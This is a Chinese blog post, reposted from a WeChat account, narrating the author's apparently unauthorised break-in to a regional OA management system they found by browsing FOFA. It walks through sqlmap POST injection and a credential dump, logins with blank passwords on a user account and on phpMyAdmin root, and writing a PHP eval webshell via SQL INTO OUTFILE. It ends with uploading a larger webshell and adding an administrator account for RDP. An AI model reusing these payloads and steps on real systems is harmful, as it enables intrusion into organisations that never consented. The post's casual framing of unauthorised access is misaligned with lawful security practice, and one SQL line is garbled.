实战:渗透测试某地区OA管理系统

admin 2022年1月6日05:22:48评论101 views字数 1034阅读3分26秒阅读模式

实战:渗透测试某地区OA管理系统

前序:中午太冷跟我朋友打了一会会小游戏,吃了一个小午饭,朋友要去电影去了,也是无聊打开我的fofa搜到了一个站

看下,家人们:


实战:渗透测试某地区OA管理系统


看样子这个站挺老了,windows服务器
我们想一下怎么拿下他
二话没说直接丢sqlmap
sqlmap -u url --form


实战:渗透测试某地区OA管理系统


好家伙,存在post注入,root权限,有物理路径可以直接getshell
算了,这不是我的目的,跑一下账号密码
如图:


实战:渗透测试某地区OA管理系统


实战:渗透测试某地区OA管理系统


就这样轻轻松松得到了OA管理员的账号密码
这个明文破解不了,所以导致我登陆不上去,这就nmd很头疼了实战:渗透测试某地区OA管理系统
我随便找了一个用户的账号,密码为空,尝试登陆一下...


实战:渗透测试某地区OA管理系统


这个站点应该几年之前就淘汰了,思路最重要
我是个小白,大佬可以多多指教实战:渗透测试某地区OA管理系统
废话不多说,寻找上传点,getshell....


实战:渗透测试某地区OA管理系统


用了我九牛二虎功夫....还是没能getshell
我想不能这样就放弃,我扫描了一下目录,
 myadmin root 密码为空  我人傻了实战:渗透测试某地区OA管理系统 ,白跑了半个点的账号密码...


实战:渗透测试某地区OA管理系统


root权限那就直接执行sql命令写文件呗
尝试了一下爆物理路径的方法

1、单引号爆路径,2、错误参数值爆路径,3、Google爆路径,4、测试文件爆路径,5、phpmyadmin爆路径,6、配置文件找路径,7、nginx文件类型错误解析爆路径


实战:渗透测试某地区OA管理系统


尝试了一系列方法,结果都已失败告终, 默默地抽了一根烟实战:渗透测试某地区OA管理系统
想起来了,这破网站还存在目录遍历啊....
给了我点自信,自信即是巅峰,我们就去配置文件找路径


实战:渗透测试某地区OA管理系统

在inc文件夹找到了这样一个php文件,家人们看下


实战:渗透测试某地区OA管理系统

可以看到网站的物理路径了...其实在这里已经getshell了,直接上传php木马就可以了
为了文章的完整性我们继续,毕竟像我这种小白难的getshell...
可以得知 D:CGOA 这就是物理路径 我们去myadmin 执行以下sql命令

第一步:
CREATE TABLE `mysql`.`cesafe` (`cesafe1` TEXT NOT NULL );


实战:渗透测试某地区OA管理系统


第二步:
INSERT INTO `mysql`.`cesafe` (`cesafe1` )VALUES ('<?php @eval($_POST[cesafe])?>');
第三步:
SELECT cesafeFROM study INTO OUTFILE 'D:/CGOA/22php';

这样就给一句话木马写进去了,我们链接一下看下....


实战:渗透测试某地区OA管理系统


上传大马whoami 看下


实战:渗透测试某地区OA管理系统


管理员权限,我们看下3389端口是否开放


实战:渗透测试某地区OA管理系统


添加管理员直接提权服务器...结束实战:渗透测试某地区OA管理系统

实战:渗透测试某地区OA管理系统

本文始发于微信公众号(疯猫网络):实战:渗透测试某地区OA管理系统

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月6日05:22:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   实战:渗透测试某地区OA管理系统https://cn-sec.com/archives/504007.html

发表评论

匿名网友 填写信息